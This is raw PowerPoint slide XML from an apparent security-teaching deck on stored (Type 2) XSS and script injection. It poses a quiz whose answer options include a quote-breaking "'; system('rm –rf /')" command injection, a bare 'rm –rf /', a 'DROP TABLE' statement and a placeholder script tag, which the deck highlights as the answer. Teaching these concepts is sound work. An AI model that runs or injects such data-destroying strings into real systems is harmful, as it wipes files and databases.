            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="object 110"/>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2391" y="450262"/>
            <a:ext cx="6061287" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-73" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-33" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1617812"/>
            <a:ext cx="10537612" cy="1494426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Look </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>following code fragments. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>one of these </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>could </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-707" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>possibly be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>comment that could </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be used </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>perform </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> injection?</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="3451487"/>
            <a:ext cx="3293533" cy="1118511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="60960" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>system('rm</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>–rf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> /');</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="353"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>–rf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-33" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="353"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-53" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>QUESTIONS;</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="353"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8331200" cy="492760"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6248400" cy="369570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>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7" name="object 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8" name="object 8"/>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33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-87" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 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0" name="object 1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1" name="object 11"/>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115" y="450262"/>
            <a:ext cx="4582160" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="2875525"/>
            <a:ext cx="3293533" cy="1118511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="60960" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>system('rm</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>–rf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> /');</a:t>
            </a:r>
            <a:endParaRPr sz="1467" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="353"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>–rf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-33" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="353"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-53" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>QUESTIONS;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="353"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1467" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3665727" y="4845305"/>
            <a:ext cx="1818640" cy="345439"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1363979" h="259079">
                <a:moveTo>
                  <a:pt x="1363980" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="259080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1363980" y="259080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1363980" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FEFDE0"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917787" y="4046051"/>
            <a:ext cx="5859780" cy="2602421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1236102"/>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="745895"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>‘question’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1292826"/>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="4009713" algn="r"/>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="4063898" algn="r"/>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933"/>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="1617812"/>
            <a:ext cx="10387753" cy="1001983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>one of these </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>could </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>possibly be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>comment that could </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-707" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
